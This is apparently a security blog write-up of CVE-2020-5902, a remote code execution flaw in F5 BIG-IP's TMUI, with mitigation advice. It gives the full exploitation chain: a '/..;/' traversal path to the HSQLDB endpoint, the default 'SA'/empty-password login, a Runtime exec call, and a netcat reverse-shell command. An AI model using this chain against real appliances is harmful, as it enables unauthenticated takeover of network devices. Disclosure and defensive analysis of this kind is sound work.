CVE-2020-5902 : RCE on F5 BIG-IP

Mikhail Klyuchnikov from Positive Technologies disclosed on July 2nd 2020 a critical remote code execution (RCE) vulnerability in the Traffic Management User Interface (TMUI) of BIG-IP, the F5 web application firewall.

The CVE received the maximum CVSS score (10); at the time of public disclosure, the number of vulnerable BIG-IP servers reachable from the Internet was estimated at 8000.

Parsing logic weakness

A BIG-IP server exposes a traffic management web interface (TMUI), powered by an Apache HTTP server, on port 443.

The configuration file /etc/httpd/conf.d/proxy_ajp.conf establishes a list of regular expressions on the URL; if one of them matches, the request is forwarded to the Tomcat server on port 8009.

For example, this is the case for the endpoint /tmui/login.jsp, which matches ^/tmui/(.*\.jsp.*)$.

However, while the Apache HTTP server interprets /..;/ as a valid folder name, Tomcat interprets it as the parent folder.

Parsing logic weakness between Apache HTTP Server and Tomcat

Hence, we can climb up the Tomcat file tree with directory traversal.

All the Tomcat resources available on a BIG-IP appliance are listed in /usr/local/www/tmui/WEB-INF/web.xml.

So, using the /..;/ directory traversal while satisfying one of the regular expressions so that the request is forwarded to Tomcat, we can reach any Tomcat resource without any authentication:

Tomcat Traversal directory

HSQLDB default password

One of the most interesting Tomcat resources is /hsqldb/. This is the entry point of the HyperSQL database of TMUI.

Unfortunately, HSQLDB ships with a default user and password in its default configuration.

These can be retrieved with a simple Google search: “SA” for the user and "" (an empty string) for the password.

So, with a script connecting to /tmui/login.jsp/..;/hsqldb/ using the default credentials, we get access to the TMUI database and can run SQL statements, still without any authentication.

HSQLDB to Reverse Shell

In the HSQLDB documentation, we find a CALL statement which can invoke stored procedures and static Java methods.

With CALL combined with Runtime.getRuntime().exec, we can pass a bash command to the server:

result = stmt.executeQuery("CALL 

So, by putting a port into listening mode on our attack computer with nc -l -p [port], and injecting nc [IP] [port] -e /bin/sh on the BIG-IP server, a shell is connected back to our attack computer: in other words, we get a reverse shell.

The BIG-IP is then fully compromised.

Remediation / Mitigation

The vulnerability was reported to F5 on April 1st 2020.

On July 1st 2020, F5 released a security advisory and patched many of its versions with minor releases correcting the vulnerability; the simplest remediation is to upgrade and get rid of the vulnerability.

However, if upgrading is not possible, F5 recommends restricting access to trusted networks only (IP whitelisting), adding 404 redirections when the URL contains ; or hsqldb, or disabling TMUI.

Find the complete article from Mikhail Klyuchnikov, technical expert at Positive Technologies, about the vulnerability: